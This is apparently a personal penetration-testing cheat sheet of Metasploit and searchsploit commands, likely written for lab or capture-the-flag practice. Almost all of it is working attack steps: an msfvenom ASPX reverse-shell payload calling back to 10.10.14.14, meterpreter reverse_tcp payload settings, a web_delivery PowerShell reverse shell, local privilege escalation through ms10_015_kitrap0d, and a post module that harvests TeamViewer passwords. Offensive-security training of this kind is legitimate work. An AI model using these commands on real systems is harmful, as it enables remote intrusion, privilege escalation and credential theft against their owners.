searchsploit <CMS Name/Package>
searchsploit -m <exploit> (to get the exact path of the exploit in kali machine)

search exploit in msfconsole:
search <Software Name>

Always run "check" command before running any exploit.

Try with both x86 and x64 payloads:

set payload linux/x64/meterpreter/reverse_tcp
set payload linux/x86/meterpreter/reverse_tcp

*************************************************************************************************************************
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Post Exploitation with metasploit:

it will suggest some exploits:

use post/multi/recon/local_exploit_suggester
set session 1
run

Following command can be use to run meterpreter in background:
background

Run one of the suggested exploit
use exploit/windows/local/ms10_015_kitrap0d
set session 1
run

Following command can be use to search files in meterpreter shell

search -f user.txt "C:\\Users\\"

*****************************************************************************************************************************

Generate Windows reverse shell (it will Powershell reverse shell command)

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.52
set srvhost 10.10.14.52
exploit

Once get the session opened message run:

sessions 1

***************************************************************************************************************************

Following is the post exploit metsaploit command (Teamviewr Exploit):

use post/windows/gather/credentials/teamviewer_passwords
set session 1
exploit

***************************************************************************************************************************
